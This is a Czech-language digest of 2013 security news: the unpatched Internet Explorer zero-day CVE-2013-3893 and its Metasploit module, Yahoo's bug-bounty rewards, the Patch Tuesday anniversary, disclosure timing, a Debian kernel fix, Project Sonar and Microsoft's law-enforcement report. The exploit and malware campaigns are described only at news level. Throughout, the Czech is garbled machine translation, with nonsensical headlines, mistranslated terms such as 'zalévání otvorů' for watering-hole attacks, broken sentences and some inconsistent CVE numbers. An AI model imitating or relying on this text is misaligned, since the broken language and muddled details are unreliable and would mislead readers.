Důležité: Kumulativní aktualizace IE součástí bude obsahovat opravy pro CVE-2013-3893, v současné době ne-záplatované, ale využívány Chyba zabezpečení v aplikaci Internet Explorer. Tento bulletin je třeba použít co nejdříve po uvolnění.

Podrobnosti naleznete http://technet.microsoft.com/en-us/security/bulletin/ms13-oct

Adobe předem oznámil pouze jednu náplast a Acrobat PDF Reader. Pro podrobnosti


Yahoo přehodnotí systém odměn za nalezené chyby

4.10.2013 Zranitelnosti
Společnost Yahoo si vysloužila veřejnou ostudu tím, že za nalezené zranitelnosti ve své síti nabízela

Švýcarská společnost High-Tech Bridge, která nalezla několik závažných (již opravených) chyb, které by mohly útočníkům umožnit i krádež e-mailových účtů, tuto odměnu nazvala špatným vtipem.

Yahoo začne odměny za nalezené chyby vyplácet 31. října. Částka, kterou výzkumníci dostanou, se bude pohybovat mezi 150 až 1 500 dolary a zaplaceno dostanou zpětně i ti, kteří chybu nahlásili od 1. července, napsal na blogu společnosti Ramses Martinez, ředitel bezpečnostního týmu společnosti Yahoo. „Samozřejmě to zahrnuje i šek pro výzkumníky z High-Tech Bridge, kterým se mé tričko nelíbilo,“ napsal.

Společnost High-Tech Bridge v pondělí vydala tiskovou zprávu, ve které uvedla, že za odhalení chyb dostali od Yahoo kupon do obchodu Yahoo v hodnotě 12,50 dolarů. Využít šel k nákupu propisek, hrnků či triček. Společnost ve zprávě uvedla, že další výzkum sítě Yahoo pozastaví a uvedla, že je odměna, kterou Yahoo nabízí „špatný vtip“.

Většina velkých společností jako Google nebo Facebook nabízí za nalezení chyb lukrativní odměny. Google platí až 20 000 dolarů a Facebook odměňuje nálezce zranitelných míst minimální částkou 500 dolarů.

Pro společnosti je levnější vyplácet tyto odměny, než platit výzkumníky, kteří by se hledáním chyb zabývali na plný úvazek. Také tím předcházejí šíření těchto citlivých informací na hackerských fórech, kde by výzkumníci mohli své znalosti také zpeněžit.

Společnost Yahoo nikdy neměla oficiální postup, jak výzkumníky odměnit. Martinez napsal, že trička posílal, aby vyjádřil své díky. „Dokonce jsem je koupil za své peníze,“ uvedl.

Společnost už se rozhodla před nějakým časem svůj program na hlášení chyb vylepšit. Yahoo na objevené zranitelnosti reagoval vždy rychle, ale „nápad posílat trička potřeboval vylepšit,“ napsal Martinez. „Náš bezpečnostní tým dokončuje upravený program celý měsíc,“ napsal. „A včera ráno přišel úder v podobě triček. Můj e-mail byl plný naštvaných zpráv, jak se opovažuji posílat jako vyjádření díků pouhé tričko.“

Yahoo plánuje vylepšit i webové stránky, přes které mohou výzkumníci chyby hlásit. „Budeme výzkumníky kontaktovat během dvou týdnů,“ uvedl Martinez. Ti, kteří úspěšně nahlásí chybu, budou moci získat i referenci v podobě dopisu či e-mailu. „Lidé, kteří odhalí nejzávažnější chyby, se také dostanou do naší síně slávy,“ napsal Martinez.


Metasploit modul Vydáno pro IE Zero Day

2.10.2013 Zranitelnosti | Hacking | Bezpečnost
Už je to 14 dnů od Microsoft vydal poradní a dočasné zmírnění pro zero-day zranitelnosti v aplikaci Internet Explorer , jeden je aktivně využíván ve volné přírodě a tzv. některými odborníky jako závažnou chybu prohlížeče, jak můžete mít.

Přesto uživatelé protože měl trochu více chránit před útoky těchto účinných než Fix It nástroj, vydané společností Microsoft 17. září. Mezitím využije již strženy řadu japonských médií stránky v útoku zalévání otvorů cílení vládních agentur a výrobců v Japonsku, a byly zapojeny do dalších útoků v Asii sahající dále než první myšlenka. Microsoft má ještě vydat out-of-band patch pro chybu, a Patch Tuesday týden pryč, to je stále více pravděpodobné, uživatelé budou i nadále vystaveny nejméně dalších sedm dní.

Tento přístup funguje, protože k dnešnímu dni známy útoky byly cílené a relativně malém měřítku. Včera však může věci byly urychleno vydáním modulu Metasploit exploitu pro CVE-2013-3893 . Pokud jste zastáncem zákona HD Mooreova , teorie navrhuje Josh Corman z Akamai, která zrcadlí Mooreova zákona výpočetní techniky v tomto neformálním útočník moc roste ve výši Metasploit, pak by se dalo očekávat, že uptick útoků, pomocí tohoto IE chyba.

Microsoft neodpověděl na žádost o komentář, ale minulý týden v reakci na útoky proti japonským médií stránky, Microsoft uvedl, že je i nadále pracovat na vývoji a testování aktualizace zabezpečení, a vyzval zákazníkům nainstalovat Fix It.

Metasploit inženýr Wei Chen napsal v blogpost , že zatímco exploit v současné době vidět v přírodě cílů IE 8 v systému Windows XP a IE 9 v systému Windows 7, je zranitelnost nalézt v IE celou cestu zpět k IE 6 a Metasploit modul by mohl být upraven tak, aby širší záběru cílů.

Microsoft píše ve svém zpravodaji , že vzdálené spuštění zranitelnost je use-po-free chyba v Microsoft vykreslování HTML motor v IE a exploit ve volné přírodě se provádí v javascriptu. To bylo také závislá na DLL Microsoft Office, který nebyl sestaven s rozložení adresového prostoru Náhodnost (ASLR) aktivován. Zneužití, proto obchází ASLR ochranu paměti tím, že spustitelný kód na známou adresu v paměti, Microsoft uvedl. Útočník by mohl využít hardcoded Return orientované programování řetěz označit stránky obsahující shell kódu jako spustitelný soubor.

Útočníci mohou nakazit oběti tím, že láká je na webové stránky hosting škodlivý javascript exploit, nebo špice on-line reklamy se exploitu.

Podle Chena, IE8 na XP verzi exploitu zaměřuje pouze anglické, čínské, japonské a korejské uživatele, na rozdíl od cílů Windows 7.

"Místo toho by exploit zkusit proti všem počítačích se systémem Windows 7 (IE8/IE9) tak dlouho, jak Office 2007 nebo Office 2010 je nainstalována," řekl. "To je proto, že Microsoft Office Nápověda Data Services Module (hxds.dll) mohou být načteny v IE, a je nutné, aby se využilo Return-orientovaného programování s cílem obejít DEP a ASLR a získat spuštění libovolného kódu."

Řada populárních japonských médií stránky byly ohroženy a byly hosting exploit javascript. IE uživatelé navštíví tyto stránky byly přesměrovány do lokalit verzi McRAT vzdáleného přístupu malware, vědci FireEye řekl na 23 září. Malware se používá k exfiltrate dat z počítače oběti a zprávy byly, že vládní úředníci a pracovníci v high-tech a výrobních organizací byla infikována.

FireEye v Darien Kindlund řekl Threatpost, že exploit javascript nejprve určit systém a prohlížeč detaily před podáváním do správné exploit. "V tomto případě, protože exploit pokrývá tolik verzí IE, útočníci nemusí nastavit předchůdce logiku, jako že v javascriptu. Mohou přinést stejný exploit (znovu a znovu) a mít jistotu, že to bude fungovat, "řekl.

FireEye řekl infikovaných počítačů připojit k velení a řízení serveru v Jižní Koreji přes port 443, zpětné provoz je nešifrované, přes jeho použití portu 443, FireEye a dodal, že druhý vzorek shromažďovány rovněž připojen ke stejné jihokorejské IP adresu . FireEye řekl, že také objevil hrst škodlivých domén Upozorňuje i na šetření v Jižní Koreji, který dovolil jim, aby připojení k útoku proti společnosti Bit9 zabezpečení v letošním roce. Stejný e-mailová adresa registrována jihokorejský serveru registrován i doménu použitý v útoku na bezpečnostní společnosti.


Udělejte si čas a vyjadřuje, jak Microsoft Patch Tuesday Ukázalo 10

2.10.2013 Zranitelnosti | Aktualizace
andrew_stormsDne 09.10.2003 společnost Microsoft oznámila, že nový bezpečnostní opravou proces, který by skončil být katalyzátorem pro významnou změnu v komunitě informační bezpečnosti. Před deseti lety, program byl oznámen tiskové zprávy, které slibovalo

"Zlepšení procesů patch management, politik a technologií, které pomáhají zákazníkům zůstat až do dnešního dne a bezpečný."
"Globální vzdělávací programy poskytnout lepší pokyny a nástroje pro zajištění systémů."
V tiskové zprávě , generální ředitel společnosti Steve Ballmer řekl: "Náš cíl je jednoduchý: dostat naši zákazníci zajistit a udržet je v bezpečí. Naším cílem je chránit naše zákazníky před rostoucí vlně kriminálních útoků. "

Ti z nás pracuje v bezpečnostním průmyslu nebo firemní informační bezpečnosti odpovědnost viděl jako přímá reakce od známého Trustworthy Computing poznámky z pera Billa Gatese v lednu 2002. Známky byly jasné. Microsoft byl konfrontován s vážným dilematem. Jeho software byl prošpikovaný bezpečnostních děr, které byly, které mají přímý negativní dopad na bezpečnost svých zákazníků, dostupnosti a soukromí. V podnikové IT, Microsoft se rychle dostal svou vlastní přezdívku "nutné zlo." IT manažeři byli nuceni používat software společnosti Microsoft pro své obchodní funkce, ale to přišlo za cenu vážných bezpečnostních rizik.

Ať už jste líbí nebo pohrdání Microsoft, nové iniciativy v oblasti bezpečnosti začala před 10 lety vytvořil velkou vlnu změn v našem oboru informační bezpečnosti.

Pro začátek, Microsoft dokázal bezpečnostní komunity, že komunikace je klíčovým kamenem vztahy s dodavateli. Nikdo nemá rád přiznat, že mají bezpečnostní problémy. Microsoft vzal skok nejen přiznat, že měl problém, ale také zavazuje poskytovat průběžné komunikaci se svými zákazníky a na všech výpočetních uživatelům. Microsoft začal blogovat o bezpečnostních otázkách a také se pustil do závažných odchozích komunikačních kampaní zaměřených na informování uživatelů.

Microsoft ukázal, že komunikace a vztahy jsou obousměrné. Powerhouse nakonec začal ve věku, kdy to přijali stejnou komunitu lidí, kteří byli zodpovědné za vyhledávání a veřejně uvolňovat bezpečnostní díry v softwaru. V současné době zveřejnění závažných bezpečnostních děr Microsoft je nyní výjimkou.

Také plánování zdrojů je tabulka podíly v podniku IT svět. Být nákladové středisko moc nepomůže, ale má tradičně nedostatečně a nedoceněný. Co je podnikové IT nebo bezpečnostní manažer dělat, když jejich primární prameny dodavatele softwaru na nich kritické opravy zabezpečení pomocí do-or-die následky? Historicky, a tak i dnes, mnoho z probíhajících projektů se snížil na rychle přerozdělit zdroje do okamžiku kritické opravy zabezpečení. Život ve světě neustálého přerušení poškozuje morálku dokončení všech plánovaných projektů.

Pomocí nového Microsoft konzistentní načasování verzi záplaty, podnikové IT může záviset na plánu a alokovat zdroje odpovídajícím způsobem. Měsíční cyklus záplatování brzy stal se lépe známý jako Patch Tuesday. Později v roce splatnosti modelu Microsoftu, bylo by to zavést moderní oznamovací službu. Víme, že dnes ve čtvrtek před Patch Tuesday, kdy jsme obdrželi vysoké úrovni úryvek o tom, co očekávat příští týden.

Microsoft také ukázal hodnotu konzistence jinými způsoby. Například Microsoft vzal brzy odvážný krok definovat své hodnocení bezpečnostnímu významu a dělal definice veřejnosti. Dokonce i Microsoft bulletinu zabezpečení textový formát a úseky byly dodány v jednotném formátu, který odborníci na bezpečnost si zvykli spoléhat. Bezpečnost lidí, jako je opakovatelné a spolehlivé systémy. Microsoft vydal právě to.

Třikrát hurá na Patch Tuesday. Je to každé druhé úterý v měsíci, že jsme oba láska a nenávist. Před deseti lety, Patch Tuesday iniciativy vytvořil hluboký přínos pro všechny společnosti, spotřebitele tím, že je snazší udržet systémy skvrny a bezpečnější. V té době, myšlenka se zdálo tak cizí, ale od té doby získal tolik po jiných výrobců, jako je Cisco, Adobe a Oracle následovaly. Strávit jen pět minut dnes a zvážit, kde budeš dnes bez Microsoft přičemž skok před 10 lety.


Vědci Zamysli Kdy Informujte uživatele veřejných zneužitím slabých

2.10.2013 Zranitelnosti | Bezpečnost
BERLIN -Just šeptat slova "zranitelnosti zveřejnění" na doslech bezpečnostní výzkumník nebo dodavatele bezpečnostních členů Response Team vám může pomoci ve strachu o svůj život v těchto dnech. Debata je tak staré a opotřebované, že není prakticky nic nového co říct, nebo žvýkat v tomto bodě. Nicméně otázka toho, kdy se odhalí, že daná chyba zabezpečení je využívána ve volné přírodě je zcela jiná.

Bez ohledu na sekty nebo Splinter Cell patříte v informačním debaty , pro většinu lidí to všechno přijde k nalezení nejefektivnější způsob, jak získat opravu zveřejněna a v rukou uživatele, tak rychle, jak je to možné. To by mohlo znamenat koordinované zpřístupnění s prodejcem nebo plného zpřístupnění na veřejném mailing listu, nebo něco mezi tím. Ale linie trochu rozmazaný, když se diskuse stáčí do vhodnou chvíli říci veřejnosti, že daná chyba zabezpečení je aktivně využíván. Může se to zdát samozřejmé, že uživatelé by měli být řečeno, jakmile je to možné, dát jim to nejlepší šanci na obranu sebe nebo své sítě. Ale existuje mnoho dalších faktorů je ve hře, a to především skutečnost, že upozorňují uživatelé také probudí útočník komunitu.

To není malá pozornost, zejména pokud se jedná o chybu v široce nasazené aplikace, jako je Internet Explorer, Adobe Flash nebo Java. Výzkumníci ze společnosti Microsoft a Lancope podíval na veřejných vykořisťování oznámení v několika významných případů z posledních několika let a zjistil, že stejně jako mnoho věcí v životě, načasování je všechno.

"Vykořisťování zveřejnění je dobrá věc kdykoliv, ale otázka je, kdy a může to způsobit problémy," řekl Tom Cross of Lancope, který spolu s Holly Stewart Microsoft, hovořil na téma na Virus Bulletin 2013 konference zde ve středu.

Jeden z případů zkoumaných pár byl Nápověda a podpora Centrum CVE-2010-1885 zranitelnost. Že chyba byla zveřejněna na konferenci Plný seznam zpřístupnění v červnu 2010 a původní sdělení zahrnovalo proof-of-concept exploit. Nedlouho poté byl exploit integrován do některých útočných sad nástrojů a útoky proti přídavkem zranitelnosti. V ostatních případech, výzkumníci prošli koordinované zveřejňování procesu, práce s dodavateli, aby si opravu připraven předtím, než oznámí chybu a po oznámení vás bude využívání pokusy okamžitě vzroste útočníci roztáhněte opravu najít chybu za ním .

Není na rozdíl od obávané zveřejnění rozpravy rozhodnutí o tom, kdy informovat uživatele o využívání pokusů závisí na řadě faktorů. Pokud chyba je obzvláště závažné a již neprobíhají, rozšířené útoky, prodejce může také rozhodnout, informovat uživatele, i když není oprava k dispozici. Na druhé straně, v případě, že útoky jsou cílené a relativně skvrnité a prodejce nemá řešení připraveno, může se rozhodnout odložit oznámení.

"Pokud se nic, co můžete říci uživateli, aby to, že to není mnoho místa při zveřejňování využije," řekl. "Záleží na míře využití, geografické rozdělení, je patch k dispozici, pokud to bude, pokud to není. Je-li odpověď říkat lidem, nepoužívat kus softwaru, který je nutný k podnikání, je skutečností, že se to nestane. "

Je také pravda, že toto rozhodnutí není vždy výhradně v rukou dodavatele nebo dokonce vědcem, který objevil zranitelnost. V některých případech mohou třetí strany bezpečnostní společnost všimnete využít pokusů proti dříve neznámé zranitelnosti a vzít krok oznamující zákazníků.

"Neexistuje jedna odpověď," řekl Kříž.


lhůt nejsou chyby, kterou hledáte

2.10.2013 Zranitelnosti
BERLIN-odvětví technologií je často používán vedoucích politiků, a jiné jako příklad toho, jak rychle se přizpůsobit a řadit tváří v tvář ničivé změny. Ale bezpečnostní komunita dělal obranu v podstatě stejným způsobem po několik desetiletí, a to navzdory skutečnosti, že hrozba dramaticky změnila, jak mají potřeby zákazníků. Tato situace je neudržitelná a musí se změnit za účelem zajištění účinné obrany proti zero-day zranitelností objevovat, říkají odborníci.

Použití činech proti nula dní, nebo neopravených zranitelností není nic nového. Útočníci hledali a použití nové chyby tak dlouho, jak tam byl software využívat. Co se změnilo v posledních letech, je rozsah použití nulové den exploit a druhu útočníků jejich použití. To bylo především jednotlivé útočníci a některé high-end počítačové trestné činnosti skupiny. Ale teď se lhůt používá vlád, zpravodajských agentur a státem podporovaných útočných týmů. V rukou těchto skupin, lhůt představují závažnou hrozbu pro cílové organizace, z nichž většina nemůže držet krok s náplastí, které vyplynuly na známých chyb, natož bránit proti útokům na nula dní.

"Není červeného tlačítka můžete tlačit, aby to jít pryč. To je jít dál a dál a dál, "Andreas Lindh I Secure ve Švédsku řekl v rozhovoru v časopisu Virus Bulletin 2013 zde ve středu. "Musíme se dostat naše priority jsou jasné. Co jsem naznačit, že se vrátíme k základům, spíše než aby si kupovali více nástrojů. Nástroje, které mají fungovat docela dobře, když budete používat správně. Vlastně máme opravdu dobré nářadí. Musíme začít se zaměřením na to podstatné, co je skutečně důležité. "

Lindh řekl, že stará koncepce obrany do hloubky, který byl zesměšňován v některých koutech v posledních letech, stále se drží ve většině případů, pokud organizace realizovat své technologie správně a ne sedět a čekat zázraky. Jedním z klíčů k úspěchu více často než ne proti vysoce postaveným útočníky, řekl, je ztvrdnout software jsme všichni závislí na pomocí technologií, jako ASLR a DEP, které brání mnoho společných útoků poškození dat v paměti. Řada způsobů, jak útočníci mohou dostat do systému klesla v posledních několika letech, Lindh řekl.

"Došlo ke snížení vektorů útoku, které lze použít," řekl. "Není to tak velký prostor pro útoky už ne."

V mnoha případech se využije které pracují nejsou šíleně kreativní kousky práce z elitních úderných týmů, nýbrž kopie využije vyrobené legitimních bezpečnostních výzkumníků.

"Tito lidé nejsou ve skutečnosti psát své vlastní hrdinské činy. Oni prosí o zbytky z bezpečnostních výzkumníků, "řekl Lindh.

Ačkoli hodně pozornosti na bezpečnostní komunity a médií je zaměřena na nula dní a nových útoků, je hodně škody v reálném světě provádí pomocí exploitů proti známých chyb. Řešení těchto otvorů je efektivní způsob, jak zvýšit své vítězné procento, Lindh řekl.

"Musíme vědět, že když vidíme chyby v softwaru není plně rozvinut, nejsou to ty, které jsme byly vytipovány jako rozhodující. Musíme změnit, "řekl. "Musíme se připojit mezery, které jsou ponechány. Musíme to udělat na základě toho, co se naučili, a pak musíme udělat to znovu a znovu a znovu. Dříve nebo později se svět bude měnit a musíme změnit s ním. Musíme lépe upřednostňovat to, co děláme. Musíme přestat krmit uživatelům všechny tyto BS o apts po celou dobu. Je to nepomáhá. "


Tři nové útoky a používat IE zero-day exploit

2.10.2013 Zranitelnosti | Hacking
Útočníci jsou i nadále hromadit na kritickém Internet Explorer nulové den, který zůstává unpatched dva týdny poté, to bylo hlásil.

Během posledních dvou týdnů se zdá, že přinejmenším tři oddělené kampaně cílené útoku byly pomocí stejné chyby dříve používaný Dog operace zástupce, kampaň, že likvidace by byla ohrožena japonských sdělovacích prostředků a technologické systémy v polovině září.

Výzkumníci FireEye nejprve objevil DeputyDog kampaň - která zadlužuje CVE-2013-3893 zranitelnost - o něco více než před týdnem. Nyní Slovo přijde, že tři další, nesouvisející kampaně, Taidoor, th3bug a Web2Crew také pomocí stejného exploit.

Web2Crew byl spatřen dne 25. září používáte Internet Explorer zranitelnosti k poklesu vzdáleného přístupu Trojan PoisonIvy do počítačů - některé patří k finanční instituce. Zatímco činem byl umístěn na serveru v Tchaj-wanu, IP adresy z Hongkongu byl použit hostit své velení a řízení server, IP adresu, která FireEye spojené s Web2Crew v průběhu měsíce srpna.

Díky CVE-2013-3892 zranitelnost, Taidoor, druh malware, který byl viděn ohrožení oběti na Tchaj-wanu přes léto se vynořil na tchajwanské vládní webové stránky na 26.září.

Konečně, FireEye si také všiml kampaň škodlivého herec th3bug pomocí zranitelnosti 27.září. To kampaň, stejně jako Web2Crew, rozpoutal PoisonIvy náklad pro ty, kdo navštívil nějaké webové stránky, je ohrožena.

FireEye v Ned Moran a Nart Villeneuve, který psal na blogu o novém kampaní včerejší poznámku, že se jedná o obvyklý jev.

"To není neobvyklé pro APT skupin ruce pryč využije k ostatním, kteří jsou nižší na zero-day potravinového řetězce - zvláště poté, co se stanou veřejně dostupnými exploit," napsal dva.

Zatímco exploit nejsou veřejně dostupné samo o sobě, to jistě stala se více rozšířená v celé počítačové trestné činnosti v podzemí jako pozdní. V pondělí vydal Metasploit exploitu modul pro zranitelnosti, něco, co bude téměř jistě rozjet útoky pomocí chyba.

Zatímco Microsoft vydala fixit nástroj pro chyby v září a nutil starší IE uživatelům stáhnout a použít ji, někteří si mysleli, že by společnost mohla ještě vydat mimo pásmo náplasti opravit chybu. Na tomto místě se společnosti obvyklé Patch vydání naplánováno na úterý příští úterý, zdá se, že uživatelé budou i nadále náchylné nejméně další týden.


Linux Kernel aktualizace opravuje DoS, svodové Bugs

30.9.2013 Zranitelnosti
Vývojáři Debianu alerted uživatele Linuxu koncem minulého týdne na novou verzi linuxového jádra, linux-2.6, která opravuje 11 samostatných chyby, které by mohlo otevřít jádro popření servisního útoku, úniku a zvýšení úrovně oprávnění.

Dann Frazier, správce Debian oznámil aktualizace zabezpečení prostřednictvím společnosti listserv pátek pozdě .

První dvě chyb zabezpečení a ohrožení identifikátory opravit úniku informací v jádře, které by mohly být zneužity pomocí 64bitového systému (CVE-2013 - 2141), a když to může znít archaicky, CD-ROM ovladač (CVE-2013-2164) . Podle Jonathana Salwan, se sídlem v Paříži Linux výzkumník, za určitých podmínek, lokální uživatel v systému se špatnou funkcí CD-ROM by mohl získat přístup k citlivým paměti jádra.

Salwan také objevil další zranitelnosti v jádře OpenVZ, že místní uživatelé mohou využít k získání přístupu k citlivým paměti jádra.

Kees Cook, člen týmu Ubuntu bezpečnost, objevil čtyři z 11 zranitelností. Dva z nich může vést k útočníkovi havárii systému pomocí DoS (CVE-2013-2888 a 2892), zatímco další dva jsou poněkud méně závažné a vliv na bloku subsystém a b43 síťový ovladač. Tyto chyby by opravdu pouze jednat o problém s těmi, se speciálně konfigurované systémy.

Zbývající opravy řešit řadu problémů, včetně úniků paměti v provádění PF_KEYv2 zásuvky rodiny a Linux SCTP protokol.

Podle obvyklé Debian, která provozuje jeden z více populárních linuxových distribucích dnes, je povzbudivé uživatelům přejít na linux-2.6 a veškerá s tím spojená v uživatelském režimu-linux balíčky.

Ti, kteří hledají více informací o zranitelnosti mohou zamířit do aktualizace zabezpečení Debianu, DSA-2766-1 , od pátku.


Nový projekt Sonar Crowdsources Embedded Device chyby zabezpečení analýzy

30.9.2013 Zranitelnosti
Stav vestavěného zabezpečení zařízení je špatná, a tam nebylo moc v cestě diskuse o opaku. Je dobře známo, že dodavatelé šetřit na bezpečnosti, například prodej, routery a další síťové převodovky chráněny pouze ve výchozím nastavení hesel nebo jiných důležitých zařízení inženýrství musí být přístupné pomocí jednoduchého příkazu telnet. Tyto akce představují enormní riziko pro infrastruktury, která tato zařízení, takže je otevřený útoku hackerů. Tyto chyby mohou vést ke ztrátě dat, snížení výkonu sítě, nebo ještě hůře ohrožují život v nebezpečí, pokud se kritické služby, jako je voda nebo energie mají vliv.

Pro Metasploit tvůrce HD Moore, to výzva k akci. Moore investoval vážně čas na zkoumání dat z předchozích skenů IPv4 adresního prostoru hledají zařízení, které odhalila nekvalitní výchozí konfiguraci a dalších zranitelných místech. Jeho vlastní Critical.io project , spolu s Internet sčítání lidu 2012 , Carna botnet a řadu akademických a výzkumných nástrojů, které prohledá internet a návratové hromadných dat na zařízení exposures udělal spoustu zářit drsné světlo na rizika těchto webových- čelí zařízení.

Ale Moore věří, že je dostatek místa pro další analýzu. On postupoval svou práci spolupracuje s týmem vědců z University of Michigan o projektu Sonar , úložiště skenovaných dat, která byla odpovědně vybírá výzkumné obce. Moore řekl, že doufá, že se zapojily bezpečnostní komunity nejen na analýzu dat získaných od skenů veřejné čelí sítí, ale také přispěje dat. Projekt Sonar se pořádá University of Michigan v scans.io .

"Potřebujeme více oči na něj, protože potřebujeme hanbu spadnout na těchto dodavatelů za strašných produktů oni produkují," řekl Moore, dodává jako příklad, že našel více o 10.000 příkazové shelly sedí on-line přístupný přes telnet, které by dát outsidera root přístup k zařízení v pochybnost. "Skutečnost, že máme problémy, jako že tam, kde není ani předstírání jistoty, ale tato zařízení nejsou nijak lepší av některých případech jsme svědky expanze zranitelné zařízení meziroční nárůst, to bylo volání k akci ke mně, aby to těžší pro dodavatelům vyhnuly zkoumání, kterou si zaslouží.

"Ta věc je hodně lidí, kteří chtěli vidět výsledky a chtěl vidět malé fotky, ale ne mnoho lidí chce kopat do věcí a vytáhněte ven," řekl Moore. "Budeme se snažit to udělat, aby to chutnější pro amatérské výzkumných pracovníků a každý den správci IT mohli použít jako zdroj."

V současné době existuje pět datové soubory hostitelem projektu Sonar, formálně známý jako Internet-Wide Scan úložiště dat, oba týmy používají řadu nástrojů pro sběr dat včetně ZMap , Internet skener vyvinutý na UM, UDPBlast, nmap a MASSCAN mezi ostatními. Dva datové soubory byly přispěl na University of Michigan, a ty patří prověřování komunikaci přes HTTPS, kteří hledají surovin certifikáty X.509 (43 milionů byly zahrnuty od 108 milionů počítačů), jakož i údaje z IPv4 skenování na portu 443. provedeného v říjnu loňského roku na míru dopad hurikánu Sandy. Rapid7 přispěla také tři datové soubory: služby otisky prstů z projektu Mooreova Critical.IO; skenování IPv4 SSL služby na portu 443 a v pravidelných DNS pro všechny IPv4 záznamy PTR.

"Poté, co procházel době dost dat se ukázalo, existuje tolik různých chyby a problémy, které opravdu jen berou některé lidské oči na věci," řekl Moore. "Je to opravdu nemá smysl sedět na takovém množství dat a ne o ni podělit."

Výzkumní pracovníci a IT manažeři mohou využít data v mnoha různými způsoby, ve velkém by vědci vytvářet zranitelnosti údaje na dodavatele nebo na výrobku nebo na užším rozsahu, data mohou být použita k tomu inventury majetku, například na konkrétní Rozsah IP adres za účelem identifikovat stávající zranitelná. Rapid7 tým použil data, například zrychlit penetrační test na 80.000 uzly sítě. Moore řekl, celá Asset Inventory bylo provedeno asi za 20 minut, na rozdíl od tři dny obvyklými nástroji a skenování.

Časná reakce byly pozitivní, a řekl Moore někteří vědci již začaly vytvářet webové služby a dotazy kolem dat. Moore dodal, že UM a Rapid7 doufáme, že další datové soubory budou nakonec přispělo, pokud jsou kolekce snahy udělat legálně av rámci etických mezích. Je to z toho důvodu, Moore řekl, že ani UM ani Rapid7 bude hostit údaje shromážděné z internetu nebo sčítání lidu Carna botnet pro tento projekt, zákonnosti, které je ještě v pochybnost.

"Právě teď se řízení od nabízení jakékoliv webové služby, nechci mít službu, kde lidé jsou v závislosti na mne, aby se jim výsledky, ani nechci být zodpovědný za to, co vidí dotazy utečou "řekl Moore. "To není to, co se snažíme řešit. Bereme v hromadných dat, které je více gigabajtů 5-6 terabajtů, a dělat, že k dispozici na webových stránkách v hromadné formě pro každého, kdo dělá výzkum stáhnout. Současně, bereme různé plátky údajů, jak dobře a říkat "Řekněme, vzít si jméno pole pro tento paket" nebo vyřadil v určité oblasti a učinit které jsou k dispozici pro lidi, kteří dělají spíše neformální testování. "


Microsoft hlásí nula požadavku na vymáhání práva na obsah Skype

30.9.2013 Zranitelnost
Microsoft zprávu o dodržování požadavků činným v trestním řízení dat ukazuje status quo pro softwarový gigant od posledního vykazovaného období. Zatímco počet žádostí od vymáhání práva po celém světě klesla v prvních šesti měsících roku 2013, Microsoft dodrženy 79 procent žádostí vyplývajících z úřední obsílky, soudní příkazy a warrantů. Pouze 2,2 procenta z těchto požadavků vedlo v zákaznickém obsah ze služeb jako je Outlook, Hotmail, Xbox Live, nebo SkyDrive jsou předáni orgánům; žádné Skype žádosti o uživatelský obsah byl dělán.

Microsoft čísla v této zprávě neberou v úvahu národních bezpečnostních požadavků na údaje, které jsou zpracovány v samostatné zprávě a zůstane diskutabilní téma pro technologické společnosti. Zabil nich, včetně Microsoft, Google, Facebook, Yahoo a nejnověji LinkedIn a Dropbox, že požádal zahraniční zpravodajské Surveillance soud (FISC) o povolení zveřejňovat souhrnné počty o národnostních požadavků bezpečnosti Dopis o zákaznických dat.

Mezitím, Microsoft výkon práva Zpráva ukazuje, že většina žádostí pochází z orgánů v USA, Velké Británii, Turecku, Německu a Francii, Skype žádosti týkající se převážně soustředí je z USA, Velké Británii, Francii a Německu. Microsoft uvedl, že žádné Skype obsah dat byl obrácen k vymáhání práva mezi 81 procent Skype žádosti vyhověly.

"Tato nová data ukazují, že přes naše služby jen nepatrný zlomek z účtů, které jsou méně 0,01 procenta stále ovlivněn požadavku na vymáhání práva na zákaznických dat," píše se ve zprávě. "Z malého množství, které byly ovlivněny, převážná většina se týkala zveřejnění non-obsahu dat."

Non-obsah dat, podle zprávy, obsahuje uživatelské jméno, fakturační adresa, IP adresa historie a další. Obsah údajů, na druhou stranu, je definována jako text e-mailové zprávy, obrázků a souborů uložených ve službě SkyDrive souborů, informací v kalendáři a kontaktní informace.

Zahrnuje všechny služby společnosti Microsoft, včetně Skype, společnost obdržela 7014 žádostí donucovacích orgánů, které ovlivňují 18.809 účtů, 11 procent z těchto požadavků vedlo uživatelského obsahu, který se převrátil a 65 procent non-obsahových dat žádostí byly dodrženy. Žádostí Microsoft nedodržela, a to buď právní zátěž nebyla splněna, nebo ne zákaznických dat byl zjištěn u daného účtu.

Co se týče Skype dat sám, bylo 759 předloženo více žádostí o 1564 účtech. Žádný obsah žádosti byly provedeny ve vztahu k Skype, přičemž 790 žádostí o non-obsahovými byly dodrženy, 80 procent žádostí.

Skype, který byl pořízen v roce 2011 společnosti Microsoft, byl středobodem skandálu dozoru NSA, protože se stal veřejností v červnu. Téměř okamžitě, údaje unikly bývalý informátorů NSA Edward Snowdena je uvedeno, že nejen že špionážní agentura má pre-šifrování přístupu k aplikaci Outlook Hotmail a dat, ale to také spolupracoval se společností Microsoft na přístup ke službě SkyDrive a Skype. Podle zprávy v deníku Guardian , NSA se chlubil, že byl schopen ztrojnásobit počet video hovory přes Skype zachycena v Prism programu.

Microsoft popřel tato obvinění a spolu s dalšími mohutnými tech firem je požádal soud FISA pro schopnost zvýšit svou zpráv na základě žádostí od vlády týkající se národní bezpečnosti. K dnešnímu dni jsou společnosti dovoleno publikovat NSL data požadavku ve svazcích po 1000, Microsoft hlášeny 0-999 pro rok 2012 a mezi 1000 a 1999 o rok dříve.

Menší společnosti jako LinkedIn a Dropbox tvrdí, že úroveň průhlednosti podávání zpráv klesá a může znamenat, že tyto společnosti mohly být větší národní bezpečnostní cíle pro datové požadavky, než jsou.


Nejnovější IE 0-day stále unpatched napadá využití je vrátit tři měsíce
30. září 2013. Zranitelnosti | Bezpečnost | Hacking
Zatímco Microsoft je ještě vydat patch pro nejnovější Internet Explorer zero-day (CVE-2013-3893), zprávy přicházejí v tom, že chyba byla využívána ve větší míře a po delší dobu, než se původně věřilo.

